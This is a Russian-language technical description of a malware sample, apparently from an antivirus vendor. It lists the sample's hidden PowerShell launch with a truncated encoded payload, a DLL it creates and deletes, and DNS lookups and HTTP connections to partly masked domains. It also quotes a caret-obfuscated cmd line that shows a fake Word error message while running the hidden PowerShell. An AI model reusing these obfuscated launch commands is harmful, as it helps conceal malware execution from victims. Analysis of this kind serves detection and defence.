Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enc UwBlAHQAIAAgACgAJwBCACcAKwAnAEMAMgA2ACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcAVABlAG0ALgBJAG8ALgBEAEkAcgBFAEMAdABvACcALAAnAHkAJwAsA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\scnfrf7\pb6asvf\o66d.dll
Удаляет следующие файлы
- %HOMEPATH%\scnfrf7\pb6asvf\o66d.dll
Сетевая активность
Подключается к
- 'ro##t.com':80
- 'sk##r.net':80
- 'no###ook03.com':80
TCP
Запросы HTTP GET
- http://www.pc##ha.com/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK pc##ha.com
- DNS ASK ro##t.com
- DNS ASK sk##r.net
- DNS ASK fu#####ndassociates.com
- DNS ASK zi#######est.toppermaterial.com
- DNS ASK ad###.##ppermaterial.com
- DNS ASK no###ook03.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAHQAIAAgACgAJwBCACcAKwAnAEMAMgA2ACcAKQAgACgAWwBUAHkAU...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
